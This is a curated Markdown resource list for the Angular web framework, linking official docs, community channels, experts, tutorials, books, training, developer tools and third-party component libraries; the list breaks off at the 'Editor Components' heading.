* [Books](#books)
* [On-Site Training](#on-site-training)
* [Approach and Explanation](#approach-and-explanation)
* [Integrations](#integrations)
* [Site Templates](#site-templates)
* [Generators](#generators)
* [Documentation tools](#documentation-tools)
* [Developer tools](#developer-tools)
* [TodoMVC](#todomvc)
* [Schematics](#schematics)
* [Third Party Components](#third-party-components)
* [Animations](#animations)
* [Auth Components](#auth-components)
* [Backend Components](#backend-components)
* [Calendars](#calendars)
* [Charts](#charts)
* [Drag/Drop](#drag/drop)
* [Editor Components](#editor-components)
* [File Upload](#file-upload)
* [Form Controls](#form-controls)
* [Icons](#icons)
* [Keyboard Mouse](#keyboard-mouse)
* [Layout Components](#layout-components)
* [Loaders](#loaders)
* [Maps](#maps)
* [Notifications](#notifications)
* [State Management](#state-management)
* [Tables](#tables)
* [UI Libraries](#ui-libraries)
* [UX Components](#ux-components)
* [Viewers](#viewers)
* [Misc Components](#misc-components)
* [JAM Stack](#jam-stack)
* [Universal](#universal-angular-2)
* [Courses & Tutorials](#universal-courses-and-tutorials)
* [Universal General Resources](#universal-general-resources)
* [Seed Projects](#universal-seed-projects)
* [TypeScript](#angular-2-in-typescript)
* [TypeScript General Resources](#typescript-general-resources)
* [Seed Projects](#typescript-seed-projects)
* [Dart](#angular-2-in-dart)
* [Seed Projects](#dart-seed-projects)
* [Traceur](#angular-2-in-traceur)
* [Traceur General Resources](#traceur-general-resources)
* [Seed Projects](#traceur-seed-projects)
* [Babel](#angular-2-in-babel)
* [Babel General Resources](#babel-general-resources)
* [Online Playground](#babel-angular-2-online-playground)
* [Seed Projects](#babel-seed-projects)
* [Babel Plugins](#babel-plugins)
* [ES5](#angular-2-in-es5)
* [Seed Projects](#es5-seed-projects)
* [Ionic 2](#ionic-2-in-angular-2)
* [Ionic 2 General Resources](#ionic-2-general-resources)
* [Meteor](#meteor-in-angular-2)
* [Meteor General Resources](#meteor-general-resources)
* [Seed Projects](#meteor-seed-projects)
* [NativeScript](#angular-2-in-nativescript)
* [NativeScript General Resources](#nativescript-general-resources)
* [Seed Projects](#nativescript-seed-projects)
* [React Native](#angular-2-in-react-native)
* [React Native General Resources](#react-native-general-resources)
* [React Native Projects](#react-native-projects)
* [Haxe](#angular-2-in-haxe)
* [Seed Projects](#haxe-seed-projects)
* [Scala](#angular-2-in-scala)
* [Seed Projects](#scala-seed-projects)
* [Bit](#angular-2-components-with-bit)
* [Security](#security)
* [NgRx](#ngrx)
### Angular
> Angular is a development platform for building mobile and desktop web applications.
#### Official Resources
* [Site](https://angular.io)
* [Blog](https://blog.angular.io)
* [Documentation](https://angular.io/docs)
* [Cheatsheet](https://angular.io/guide/cheatsheet)
* [Getting Started Guide](https://angular.io/guide/quickstart)
* [GitHub Repo](https://github.com/angular/angular)
#### Community
* `#angular2` channel on Freenode IRC Server
* [`#angular`](https://twitter.com/hashtag/angular) hashtag on Twitter
* [Gitter Channel](https://gitter.im/angular/angular)
* [Angular StackOverflow](https://stackoverflow.com/questions/tagged/angular)
* [@Angular on Twitter](https://twitter.com/angular)
* [/r/Angular2 Subreddit](https://www.reddit.com/r/Angular2/)
* [Angular Group on Facebook](https://www.facebook.com/groups/angular2/)
* [AngularJS on Google+](https://plus.google.com/+AngularJS)
* [AngularAir](https://angularair.com/) podcast and live broadcast
* [Adventures in Angular](https://devchat.tv/adv-in-angular) podcast
* [Angular Expo](https://angularexpo.com/) showcase
* [`#ng-2 Slack Channel`](https://angularbuddies.slack.com/messages/ng-2/) on AngularBuddies
* [`#angular2 Slack Channel`](https://dartlang.slack.com/messages/angular2) on dartlang.slack.com ([Sign up](https://dartlang-slack.herokuapp.com/))
* [Programming Community Curated Resources for Learning Angular](https://hackr.io/tutorials/learn-angular)
* [Top rated Angular stackoverflow questions Dashboard] (https://dashboard.nbshare.io/apps/stackoverflow/top-angular-questions/)
#### Angular Team on twitter
* [@mhevery](https://twitter.com/mhevery)
* [@IgorMinar](https://twitter.com/IgorMinar)
* [@naomitraveller](https://twitter.com/naomitraveller)
* [Minko Gechev](https://twitter.com/mgechev)
* [Alan Agius](https://twitter.com/AlanAgius4)
* [George Kalpakas](https://twitter.com/gkalpakas)
* [Stephen Fluin](https://twitter.com/stephenfluin)
#### Experts on Twitter
> List of Angular experts you should follow on Twitter (in no particular order). This list is by no means complete.
* [@PatrickJS__](https://twitter.com/PatrickJS__)
* [@scotups](https://twitter.com/scotups)
* [@pkozlowski_os](https://twitter.com/pkozlowski_os)
* [@teropa](https://twitter.com/teropa)
* [@eggheadio](https://twitter.com/eggheadio)
* [@hirez_io](https://twitter.com/hirez_io)
* [@cedric_exbrayat](https://twitter.com/cedric_exbrayat)
* [@amcdnl](https://twitter.com/amcdnl)
* [@victorsavkin](https://twitter.com/victorsavkin)
* [@jeffbcross](https://twitter.com/jeffbcross)
* [@waterplea](https://twitter.com/waterplea)
* [@marsibarsi](https://twitter.com/marsibarsi)
* [@maciejtreder](https://twitter.com/maciejtreder)
* [@codewith_ahsan](https://twitter.com/codewith_ahsan)
##### [Google Developer Experts](https://developers.google.com/experts/all/technology/web-technologies)
* [Jack Franklin](https://twitter.com/jack_franklin)
* [Thierry Chatel](https://twitter.com/ThierryChatel)
* [Uri Shaked](https://twitter.com/urishaked)
* [Gonzalo Ruiz de Villa Suárez](https://twitter.com/gruizdevilla)
* [Sharon DiOrio](https://twitter.com/sharondio)
* [John Papa](https://twitter.com/John_Papa)
* [Dan Wahlin](https://twitter.com/danwahlin)
* [Christian Weyer](https://twitter.com/christianweyer)
* [Todd Motto](https://twitter.com/toddmotto)
* [Tim Ruffles](https://twitter.com/timruffles)
* [Wassim Chegham](https://twitter.com/manekinekko)
* [Aaron Frost](https://twitter.com/js_dev)
* [Wilson Mendes](https://twitter.com/willmendesneto)
* [Jared Williams](https://twitter.com/jaredwilli)
* [Gerard Sans](https://twitter.com/gerardsans)
* [Pascal Precht](https://twitter.com/PascalPrecht)
* [Jeff Whelpley](https://twitter.com/jeffwhelpley/)
* [Raúl Jiménez](https://twitter.com/elecash/)
* [Ciro Nunes](https://twitter.com/cironunesdev/)
* [Maxim Salnikov](https://twitter.com/webmaxru)
* [Deborah Kurata](https://twitter.com/deborahkurata)
* [Shai Reznik](https://twitter.com/shai_reznik)
* [Manfred Steyer](https://twitter.com/manfredsteyer)
* [Juri Strumpflohner](https://twitter.com/juristr)
* [William Grasel](https://twitter.com/willgmbr)
* [Alyssa Nicoll](https://twitter.com/AlyssaNicoll)
* [Nir kaufman](https://twitter.com/nirkaufman)
* [Dmitriy Shekhovtsov](https://twitter.com/valorkin)
* [Jeff Delaney](https://twitter.com/jeffdelaney23)
* [Nishu Goel](https://twitter.com/TheNishuGoel)
* [Alex Inkin](https://twitter.com/waterplea)
* [Santosh Yadav](https://twitter.com/SantoshYadavDev)
* [Ankit](https://twitter.com/ankitsharma_007)
* [Siddharth Ajmera](https://twitter.com/SiddAjmera)
* [Muhammad Ahsan Ayaz](https://twitter.com/codewith_ahsan)
* [Dmytro Mezhenskyi](https://twitter.com/DecodedFrontend)
* [Michael Hladky](https://twitter.com/Michael_Hladky)
* [**{{** add_expert **}}**](https://github.com/gdi2290/awesome-angular/edit/gh-pages/README.md)
#### Server-Side Rendering
* [Angular Universal Repository (GitHub)](https://github.com/angular/universal)
* [SEO-Friendly Angular SPA: Universal Server-Side Rendering Tutorial](https://snipcart.com/blog/angular-seo-universal-server-side-rendering)
* [ng-web-apis/universal — an opensource set of native API fallbacks and stubs](https://github.com/ng-web-apis/universal)
* [Guide to Angular Universal - a comprehensive guide how to sharpen your Universal Skills](https://www.newline.co/courses/newline-guide-to-angular-universal)
#### Material Design
* [Official Angular Material Design (GitHub)](https://github.com/angular/material2)
* [md2](https://www.npmjs.com/package/md2) Angular2 based Material Design components, directives and services are Accordion, Autocomplete, Collapse, Colorpicker, Datepicker, Dialog(Modal), Menu, Multiselect, Select, Switch, Tabs, Tags(Chips), Toast and Tooltip.
* [ng2-material](https://www.npmjs.com/package/ng2-material) set of material2 examples and extra components (data table, dialog, ...) built on top of @angular2-material/core
* [angular2-mdl](https://www.npmjs.com/package/angular2-mdl) Angular 2 components, directives and styles based on Material Design Lite
* [mdl-ext](https://www.npmjs.com/package/mdl-ext) Material Design Lite Ext (carousel, grid, lightbox, selectfield, sticky header, ...)
* [ng2-materialize](https://github.com/sherweb/ng2-materialize) An Angular 2 wrap around Materialize library
* [Material Light](https://github.com/YagoLopez/material-light) Light, fast and easy to use Material Design components for Angular 2+ (Especially for mobile UI). There are several alternatives but this one has added value and advantages in my opinion (Take a loot at the Readme.md for details). There is also an online demo to see it in action. (API documentation is still lacking but in process).
* [Blox Material](https://github.com/src-zone/material) A lightweight Material Design library for Angular, based upon Google's Material Components for the Web.
* [Material Web Components](https://trimox.github.io/angular-mdc-web) Material Web Components for Angular. A faithful and accurate representation of Material Design as envisioned on the web.
* [MDBootstrap](https://github.com/mdbootstrap/Angular-Bootstrap-with-Material-Design) Built with Angular 7, Bootstrap 4 and TypeScript powerful UI KIT providing a set of slick, responsive page templates, layouts, components and widgets to rapidly build responsive, mobile-first websites and apps.
#### Cheatsheet
* [Official Angular Cheatsheet](https://angular.io/guide/cheatsheet)
* [Dart API Cheatsheet](https://docs.google.com/document/d/1FYyA-b9rc2UtlYyQXjW7lx4Y08MSpuWcbbuqVCxHga0/edit#heading=h.34sus6g4zss3)
* [Angular Dart cheatsheet](https://github.com/andresaraujo/angular2_cheatsheet_dart)
* [Angular Performance Checklist](https://github.com/mgechev/angular-performance-checklist)
* [List of 100 Angular Interview questions and answers](https://github.com/sudheerj/angular-interview-questions)
* [Angular References](https://ngrefs.com)
* [Angular Developer Roadmap](https://roadmap.sh/angular)
#### Features
###### Directives
Directives allow you to attach behavior to elements in the DOM.
###### Components
A component is a directive which uses shadow DOM to create encapsulate visual behavior. Components are typically used to create UI widgets or to break up the application into smaller components.
##### View
A View is a core primitive used by angular to render the DOM tree.
##### Templates
Templates are markup which is added to HTML to declaratively describe how the application model should be
projected to DOM as well as which DOM events should invoke which methods on the controller.
##### Change detection
Every component gets a change detector responsible for checking the bindings defined in its template.
##### Dependency Injection
Angular 1.x has two APIs for injecting dependencies into a directive. Angular 2 unifies the two APIs, making the code easier to understand and test.
##### Pipes
Pipes can be appended on the end of the expressions to translate the value to a different format.
##### Web Workers
WebWorker support in Angular is designed to make it easy to leverage parallelization in your web application.
When you choose to run your application in a WebWorker angular runs both your application's logic and the
majority of the core angular framework in a WebWorker.
##### HTTP
The HttpClient offers a simplified client HTTP API for Angular applications that rests on the XMLHttpRequest interface exposed by browsers. Additional benefits of HttpClient include testability features, typed request and response objects, request and response interception, Observable apis, and streamlined error handling.
* [Official HttpClient](https://angular.io/guide/http)
##### Router
* [Official Routing & Navigation](https://angular.io/guide/router)
##### Test
* [Testing Http services in Angular 2 with Jasmine](https://chariotsolutions.com/blog/post/testing-http-services-angular-2-jasmine/)
* [Testing UI Components with the TestComponentBuilder](https://chariotsolutions.com/blog/post/testing-angular-2-components-unit-tests-testcomponentbuilder/)
* [Marble testing for RxJS observables in Angular](https://www.mokkapps.de/blog/how-i-write-marble-tests-for-rxjs-observables-in-angular/)
* [Testing Angular – A Guide to Robust Angular Applications](https://testing-angular.com)
##### Ahead-of-Time Compilation
* [Official Documentation](https://angular.io/guide/aot-compiler)
* [Ahead-of-Time Compilation in Angular](https://blog.mgechev.com/2016/08/14/ahead-of-time-compilation-angular-offline-precompilation/)
* [Building an Angular Application for Production](https://blog.mgechev.com/2016/06/26/tree-shaking-angular2-production-build-rollup-javascript/)
* [Demystifying Ahead-Of-Time Compilation In Angular 2](https://slides.com/wassimchegham/demystifying-ahead-of-time-compilation-in-angular-2-aot-jit)
* [Multiple solutions for Angular Ahead of Time (AOT) Compilation](https://blog.craftlab.hu/multiple-solutions-for-angular-ahead-of-time-aot-compilation-c474d9a0d508)
* [Code Example with Webpack](https://github.com/blacksonic/angular2-aot-webpack)
* [Code Example with Rollup](https://github.com/mgechev/angular2-ngc-rollup-build)
#### Angular CLI
* [Official web page](https://cli.angular.io/)
* [Official repository](https://github.com/angular/angular-cli)
* [ng-cli-hooks](https://github.com/smartin85/ng-cli-hooks) - Hooks for the Angular CLI to customize the build
#### Webpack
* [Official web page](https://webpack.js.org)
* [Angular Webpack Starter from PatrickJS](https://github.com/gdi2290/angular-starter)
* [Angular Webpack from preboot](https://github.com/preboot/angular-webpack)
* [Angular Nightly Webpack Starter](https://github.com/qdouble/angular-webpack2-starter)
* [Angular Webpack with Visual Studio ASP.NET Core from Damien Bowden](https://github.com/damienbod/AngularWebpackVisualStudio)
* [Angular Typescript Webpack from schempy](https://github.com/schempy/angular2-typescript-webpack)
* [Angular Webpack Tour of Heroes from michaelbazos](https://github.com/michaelbazos/angular-starter) - Tour of Heroes official typescript tutorial built with webpack
* [Angular Webpack + rxjs + modules](https://github.com/jorgeas80/angular2-webpack-toh)
#### Series
* Ionic
* Angular
* [Introduction](https://blog.ionic.io/angular-2-series-introduction/)
* [Components](https://blog.ionic.io/angular-2-series-components/)
* Auth0
* Angular
* [Working with Pipes](https://auth0.com/blog/angular2-series-working-with-pipes/)
* [Domain Models and Dependency Injection](https://auth0.com/blog/angular-2-series-part-2-domain-models-and-dependency-injection/)
* [Using Http](https://auth0.com/blog/angular-2-series-part-3-using-http/)
* [Create a Desktop App with Angular 2 and Electron](https://auth0.com/blog/create-a-desktop-app-with-angular-2-and-electron/)
* thoughtram
* Angular Template Syntax Demystified
* [Part 1](https://blog.thoughtram.io/angular/2015/08/11/angular-2-template-syntax-demystified-part-1.html)
* [letsboot.com](https://medium.com/letsboot)
* Test Driven Development
* [Part 1 Angular TDD, Karma, Jasmine, PhantomJS, Gitlab-CI](https://medium.com/letsboot/angular-4-and-testing-angular-cli-gitlab-ci-ng-test-phantomjs-tdd-afc20f50b928)
* Angular and Firebase
* [Part 1 Let’s learn how to install and setup AngularFire2 4.0](https://medium.com/letsboot/lets-learn-how-to-install-and-setup-angularfire2-4-0-135d72bb0a41)
#### Video Tutorials
* [Egghead.io - Angular](https://egghead.io/browse/frameworks/angular)
* [Egghead.io - Build Redux Style Applications with Angular2, RxJS, and ngrx/store](https://egghead.io/courses/building-a-time-machine-with-angular-2-and-rxjs)
* [udemy - Introduction to Angular 2](https://www.udemy.com/introduction-to-angular2/)
* [udemy - Angular 2 with TypeScript for Beginners: The Pragmatic Guide](https://www.udemy.com/angular-2-tutorial-for-beginners/)
* [udemy - The Complete Guide to Angular 2](https://www.udemy.com/the-complete-guide-to-angular-2/)
* [Pluralsight - Angular 2: First Look](https://www.pluralsight.com/courses/angular-2-first-look)
* [Pluralsight - Angular 2: Getting Started](https://www.pluralsight.com/courses/angular-2-getting-started-update)
* [Channel9 - The Future of TypeScript: ECMAScript 6, Async/Await and Richer Libraries](https://channel9.msdn.com/Events/Build/2015/3-644)
* [Channel9 - Creating Cross-Platform Apps with Angular 2](https://channel9.msdn.com/Events/Build/2016/T627)
* [Code School - Accelerating Through Angular 2](https://www.codeschool.com/courses/accelerating-through-angular)
* [Angular Pro Screencast](https://www.youtube.com/playlist?list=PLLf-VBOaoVk1E9fTBZdq1CfnRa2TtL_Kb)
* [Angular typed Store](https://www.youtube.com/watch?v=bEkPEnudm7s&feature=youtu.be)
* [Angular advanced tips and tricks](https://www.youtube.com/watch?v=vyiyJCLlGwo&feature=youtu.be)
* [Angular Fullstack JavaScript Channel](https://www.youtube.com/channel/UCRefxaAA-7PfezH3CY87fzw)
* [Angular 4 Master Class: Beginner to Advanced](https://www.udemy.com/angular-crash-course-for-beginners)
* [List of over 140 Angular Courses (free and paid) at Classpert](https://classpert.com/angularjs)
#### Style Guides
* [Official Angular style guide](https://angular.io/guide/styleguide)
* [Shared TSLint & codelyzer rules by fulls1z3](https://github.com/ng-seed/angular-tslint-rules)
#### Angular Connect
* [Keynote – Brad Green, Igor Minar and Jules Kremer](https://www.youtube.com/watch?v=UxjgUjVpe24)
* [Testing strategies with Angular 2 – Julie Ralph](https://www.youtube.com/watch?v=C0F2E-PRm44)
* [Building native mobile apps with Angular 2 0 and NativeScript - Sebastian Witalec](https://www.youtube.com/watch?v=4SbiiyRSIwo)
* [Angular 2 Data Flow – Jeff Cross, Rob Wormald and Alex Rickabaugh](https://www.youtube.com/watch?v=bVI5gGTEQ_U)
* [Iterative version upgrade strategies for large Angular applications – Jen Bourey](https://www.youtube.com/watch?v=8tGcdaItj0I)
* [Debugging Angular 2 Apps with Batarangle – Yuri Takhteyev and Igor Krivanov](https://www.youtube.com/watch?v=cAC4d3KIQcM)
* [Building apps with Firebase and Angular 2 - Sara Robinson](https://www.youtube.com/watch?v=RD0xYicNcaY)
* [Better concepts, less code in Angular 2 - Victor Savkin and Tobias Bosch](https://www.youtube.com/watch?v=4YmnbGoh49U)
* [Modularity and Packaging for Angular2 Applications – Pawel Kozlowski](https://www.youtube.com/watch?v=9odY9Rh5kTQ)
* [Creating realtime apps with Angular 2 and Meteor - Uri Goldshtein](https://www.youtube.com/watch?v=3FT0BqYASCo)
#### Books
* [ng-book 2](https://www.ng-book.com/2/) `fullstack.io`
* [Become a ninja with Angular 2](https://books.ninja-squad.com/angular) `Ninja Squad`
* [Angular Development with TypeScript](https://www.manning.com/books/angular-2-development-with-typescript) `Manning Publications`
* [Angular in Action](https://www.manning.com/books/angular-in-action) `Manning Publications`
* [Practical Angular 2](https://leanpub.com/practical-angular-2) `Leanpub`
* [Switching to Angular 2](https://www.packtpub.com/product/switching-to-angular-2/9781785886201) `Packt Publishing`
* [Rangle's Angular 2 training](https://www.gitbook.com/book/rangle-io/ngcourse2/details) `Rangle.io`
* [Testing Angular Applications](https://www.manning.com/books/testing-angular-applications) `Manning Publications`
* [Angular-Buch (German)](https://angular-buch.com/) `dpunkt.verlag`
* [Angular Institute](https://angular.institute/) `angular.institute`
* [Build a Full-Stack Web Application Using Angular & Firebase](https://www.c-sharpcorner.com/ebooks/build-a-full-stack-web-application-using-angular-and-firebase) `Ankit Sharma`
* [Angular Cookbook - 80+ Recipes to enhance your Angular skills for enterprises](https://codewithahsan.dev/ng-book) `Packt Publishing`
* [Build a Frontend Web Framework (From Scratch)](https://www.manning.com/books/build-a-frontend-web-framework-from-scratch) `Manning Publications`
#### On-Site Training
* [Angular Boot Camp](https://angularbootcamp.com)
* [thoughtram](https://thoughtram.io/training.html)
* [ng-book](https://www.ng-book.com/2/)
* [Angular 2 Workshop](https://chariotsolutions.com/course/angular-workshop-fundamentals-architecture/)
* [Web Age Solutions](https://www.webagesolutions.com/courses/WA2533-introduction-to-angular-2-programming)
* [Letsboot.com](https://www.letsboot.com/angular-2-in-house-training-support)
* [Angular.Schule (in Germany)](https://angular.schule/)
* [Angular.DE (Germany)](https://angular.de/schulungen/angular-intensiv/)
* [Workshops.DE (Germany)](https://workshops.de/seminare-schulungen-kurse/angular-typescript/)
#### Approach and Explanation
* Victor Savkin
* [Dependency Injection in Angular 1 and Angular 2](https://vsavkin.com/dependency-injection-in-angular-1-and-angular-2-d69589979c18)
* [Writing Angular in Typescript](https://vsavkin.com/writing-angular-2-in-typescript-1fa77c78d8e8)
* [Angular Template Syntax](https://vsavkin.com/angular-2-template-syntax-5f2ee9f13c6a)
* [The Core Concepts of Angular 2](https://vsavkin.com/the-core-concepts-of-angular-2-c3d6cbe04d04)
* [Two Phases of Angular 2 Applications](https://vsavkin.com/two-phases-of-angular-2-applications-fda2517604be)
* [Change Detection in Angular 2](https://vsavkin.com/change-detection-in-angular-2-4f216b855d4c)
* [Better Support For Functional Programming In](https://vsavkin.tumblr.com/post/108837493941/better-support-for-functional-programming-in)
* [Angular 2 Bits Unified Dependency Injection](https://vsavkin.tumblr.com/post/102965317996/angular-2-bits-unified-dependency-injection)
* [Angular 2 Router](https://vsavkin.com/angular-2-router-d9e30599f9ea)
* thoughtram
* [Developing a tabs component in Angular 2](https://blog.thoughtram.io/angular/2015/04/09/developing-a-tabs-component-in-angular-2.html)
* [Developing a zippy component in Angular 2](https://blog.thoughtram.io/angular/2015/03/27/building-a-zippy-component-in-angular-2.html)
* [Resolving Service Dependencies in Angular 2](https://blog.thoughtram.io/angular/2015/09/17/resolve-service-dependencies-in-angular-2.html)
* [Forward references in Angular 2](https://blog.thoughtram.io/angular/2015/09/03/forward-references-in-angular-2.html)
* [Host and Visibility in Angular 2's Dependency Injection](https://blog.thoughtram.io/angular/2015/08/20/host-and-visibility-in-angular-2-dependency-injection.html)
* [Dependency Injection in Angular 2](https://blog.thoughtram.io/angular/2015/05/18/dependency-injection-in-angular-2.html)
* [Routing in Angular 2 **Deprecated**](https://blog.thoughtram.io/angular/2015/06/16/routing-in-angular-2.html)
* [Routing in Angular 2 Revisited](https://blog.thoughtram.io/angular/2016/06/14/routing-in-angular-2-revisited.html)
* [Angular 2 Template Syntax Demystified - Part 1](https://blog.thoughtram.io/angular/2015/08/11/angular-2-template-syntax-demystified-part-1.html)
* [View Encapsulation in Angular 2](https://blog.thoughtram.io/angular/2015/06/29/shadow-dom-strategies-in-angular2.html)
* [Styling Angular 2 components](https://blog.thoughtram.io/angular/2015/06/25/styling-angular-2-components.html)
* [Even better ES5 code for Angular 2](https://blog.thoughtram.io/angular/2015/07/06/even-better-es5-code-for-angular-2.html)
* [Writing Angular 2 code in ES5](https://blog.thoughtram.io/angular/2015/05/09/writing-angular-2-code-in-es5.html)
* [The difference between Annotations and Decorators](https://blog.thoughtram.io/angular/2015/05/03/the-difference-between-annotations-and-decorators.html)
* Hristo Georgiev
* [Debugging Angular 2 Applications](https://www.pluralsight.com/guides/debugging-angular-2-applications)
* Helgevold Consulting
* [Web Workers in Angular 2.0](https://www.syntaxsuccess.com/viewarticle/web-workers-in-angular-2.0)
* [Creating a Virtualized Grid](https://www.syntaxsuccess.com/viewarticle/virtualized-spreadsheet-component-in-angular-2.0)
* [Socket.io with Observables](https://www.syntaxsuccess.com/viewarticle/socket.io-with-rxjs-in-angular-2.0)
* [Change Detection](https://www.syntaxsuccess.com/viewarticle/change-detection-in-angular-2.0)
* Burak Tasci (fulls1z3)
* [Angular 4 with server side rendering (aka Angular Universal)](https://medium.com/burak-tasci/angular-4-with-server-side-rendering-aka-angular-universal-f6c228ded8b0)
#### Integrations
* [FalcorJS + Angular2 (Video)](https://www.youtube.com/watch?v=z8UgDZ4rXBU&feature=youtu.be)
* [Angular2-Meteor](https://angular-meteor.com/angular2)
* [nativescript-angular](https://github.com/NativeScript/nativescript-angular)
* [react-native-renderer](https://github.com/angular/react-native-renderer)
* [ng-sapphiredb](https://github.com/SapphireDb/ng-sapphiredb) - Client implementation of SapphireDb, a framework for easy development of applications with realtime data synchronization and a self hosted alternative to firebase realtime database/firestore for asp.net core and ef core. Check out the documentation for more details: [Documentation](https://sapphire-db.com)
* [GraphQL + Angular](https://github.com/apollographql/apollo-angular)
* [ckeditor5-angular](https://github.com/ckeditor/ckeditor5-angular) - An official CKEditor 5 rich text editor component for Angular 2+
* [ckeditor4-angular](https://github.com/ckeditor/ckeditor4-angular) - An official CKEditor 4 rich text editor component for Angular 2+
#### Decorators
* [segal-decorators](https://github.com/danrevah/segal-decorators) Bunch of useful decorators for the web!
* [ng-portal](https://github.com/nigrosimone/ng-portal) Component property connection in Angular application.
* [ng-lock](https://www.npmjs.com/package/ng-lock) Angular decorator for lock a function and user interface while a task running.
#### Site Templates
* [NG-Dashboard](https://github.com/YagoLopez/ng-dashboard) - Dashboard for Angular 4+. UI Components based on [Material Light](https://github.com/YagoLopez/material-light?ref=awesome-angular). Chart Component based on [MetricsGraficsJS](https://www.metricsgraphicsjs.org). Map Directive based on [LeafletJS](https://leafletjs.com). [DEMO ONLINE](https://yagolopez.js.org/ng-dashboard/dist/)
* [HowToKeepAngularDeploymentSizeSmall](https://github.com/younos1986/HowToKeepAngularDeploymentSizeSmall) - A sample included Homepage and Dashboard for Angular 7 and a demonestration of How To Keep Angular Deployment Size Small
* [Angular Material Dashboard](https://github.com/flatlogic/angular-material-dashboard) - Responsive Angular admin dashboard with material design based on Angular Material.
#### Pipes
* [fuel-ui](https://github.com/FuelInteractive/fuel-ui) OrderBy and Range pipes ported from Angular 1.x to Angular 2
* [ngx-filter-pipe](https://github.com/VadimDez/ngx-filter-pipe) Pipe for filtering arrays
* [ngx-pipes](https://github.com/danrevah/ngx-pipes) Bunch of useful pipes for Angular and beyond!
* [ngx-order-pipe](https://github.com/VadimDez/ngx-order-pipe) OrderBy pipe for Angular4+ - sort collection by a field
* [angular2-camelcase](https://github.com/previousdeveloper/angular2-camelcase) Angular2 pipe to convert camelCase strings to human readable strings Edit
* [ng-generic-pipe](https://github.com/nigrosimone/ng-generic-pipe) Generic pipe for Angular application.
#### Generators
* Node.js
* Slush
* [TheVelourFog/slush-angular2](https://github.com/RyanMetin/slush-angular2)
* Yeoman
* [swirlycheetah/generator-angular2](https://github.com/chrisdwheatley/generator-angular2)
* ngX-Rocket: Extensible Angular 4+ enterprise-grade generator and tools
* [ngx-rocket/generator-ngx-rocket](https://github.com/ngx-rocket/generator-ngx-rocket)
* [ngx-rocket/cli](https://github.com/ngx-rocket/cli)
* [ngx-rocket/core](https://github.com/ngx-rocket/core)
* Dart
* Stagehand
* [dart-lang/stagehand](https://github.com/dart-lang/stagehand)
* Scaffold
* [ScaffoldHub.io](https://scaffoldhub.io): Generate full Angular Material applications with MongoDB, SQL or Firebase Firestore databases.
#### Documentation tools
* [Storybook](https://github.com/storybooks/storybook) : "The UI development environment you'll love to use"
* [Compodoc](https://github.com/compodoc/compodoc) : "The missing documentation tool for your Angular 2 application", integrate well with npm scripts
* [NgModule-Viz](https://github.com/politie/ngmodule-viz) : Visualize the dependencies between the NgModules in your Angular 2+ application.
* [ng-app-counter](https://github.com/Jamaks/ng-app-counter) : Count the number of Modules, Lazy Modules, Pipes, Providers, Directives, Components used in an Angular application.
#### Developer tools
* [Angular State Inspector](https://chrome.google.com/webstore/detail/angular-state-inspector/nelkodgfpddgpdbcjinaaalphkfffbem) - Helps you debug Angular component state. Supports Angular 1/2+/Ivy.
* [Augury](https://augury.rangle.io/) - Browser extension for debugging and profiling Angular applications.
* [CodeSandbox](https://codesandbox.io/s/angular-angular) - An online IDE and prototyping tool for rapid Angular development.
* [Bugfender](https://bugfender.com/platforms/angular-logging/) - A cloud service to collect logs and Angular errors in Real-Time.
* [Angular Dev Tools](https://angular.io/guide/devtools/) - Angular DevTools is a Chrome extension that provides debugging and profiling capabilities for Angular applications.
#### TodoMVC
* [Official Angular 2.0](http://todomvc.com/examples/angular2/)
#### Schematics
* [Cypress](https://github.com/briebug/cypress-schematic): Add Cypress to an Angular CLI application
* [Jest](https://github.com/briebug/jest-schematic): Configure Angular to execute unit tests with Jest instead of Karma + Jasmine
* [Prettier](https://github.com/schuchard/prettier-schematic): Add Prettier and a pre-commit hook for formatting staged files in an Angular application
* [Tailwind CSS](https://github.com/ngneat/tailwind): Add Tailwind CSS to an Angular application
* [Threejs](https://github.com/JohnnyDevNull/ng-three-template): New three.js starter app
---
### Third Party Components
#### Animations
* [lottie-angular2](https://github.com/chenqingspring/ng-lottie) - Render After Effects animations on Angular2 based on Bodymovin.
* [ng-animate](https://github.com/jiayihu/ng-animate) - 🌙 A collection of cool, reusable and flexible animations for Angular
* [ngx-interactive-paycard](https://github.com/milantenk/ngx-interactive-paycard) - Interactive payment card library with smooth animations
* [ng-particles](https://github.com/matteobruni/tsparticles/blob/master/components/angular) - A component to easily add Particles animations to your Angular application
#### Auth Components
* [casl-angular](https://github.com/stalniy/casl/tree/master/packages/casl-angular) - Module which integrates isomorphic permissions management library [CASL](https://github.com/stalniy/casl) with Angular2+
* [ng2-permission](https://github.com/JavadRasouli/ng2-permission) - Fully featured permission based access control for your angular 4+ applications. This module inspired from [`angular-permission`](https://github.com/Narzerus/angular-permission).
* [ngx-auth-firebaseui](https://github.com/AnthonyNahas/ngx-auth-firebaseui) - Angular Material UI component for `firebase` `authentication`
* [ngx-auth](https://github.com/fulls1z3/ngx-auth) -Authentication utility for Angular by @fulls1z3
* [ngx-permissions](https://github.com/AlexKhymenko/ngx-permissions) - Permission and roles based access control for your angular(angular 2, angular 4,5+) applications(AOT, lazy modules compatible)
#### Backend Components
* [Cloudinary](https://github.com/cloudinary/cloudinary_angular/tree/angular_next) - Angular2 SDK for image and video management in the cloud
* [ng-s-resource](https://github.com/hiyali/ng-s-resource) - Simplify RESTful http resource generator for Angular 4+.
* [ngx-restangular](https://github.com/2muchcoffeecom/ngx-restangular) - Restangular for Angular 2 and higher versions.
#### Calendars
* [angular-calendar](https://github.com/mattlewis92/angular-calendar) - A flexible calendar component for angular 6.0+ that can display events on a month, week or day view.
* [ng-data-picker](https://github.com/hiyali/ng-data-picker) - 🏄🏼 A data picker based on Angular 4+ (like iOS native datetime picker)
* [ng-fullcalendar](https://github.com/ng-fullcalendar/ng-fullcalendar) Fullcalendar module for Angular
#### Charts
* [@ctrl/ngx-chartjs](https://github.com/TypeCtrl/ngx-chartjs) - Functional Chart.js wrapper for Angular
* [dl-chart](https://github.com/Chtau/dlChart) - Simple and lightweight Chart library without extern Dependencies
* [ng2-charts](https://github.com/valor-software/ng2-charts) Beautiful charts for Angular2 based on Chart.js
* [ngx-charts](https://github.com/swimlane/ngx-charts) - Declarative Charting Framework for Angular2 and beyond!
* [ngx-f2](https://github.com/hamdiwanis/ngx-f2) - Angular2+ wrapper for antv f2 mobile oriented charts
* [ngx-trend](https://github.com/scttcper/ngx-trend) - 📈 Simple, elegant spark lines for Angular
#### Drag/Drop
* [angular2-grid](https://github.com/BTMorton/angular2-grid) A drag/drop/resize grid-based plugin directive for angular2.
* [ng2-dragula](https://github.com/valor-software/ng2-dragula) Drag and Drop so simple it hurts!
#### Editor Components
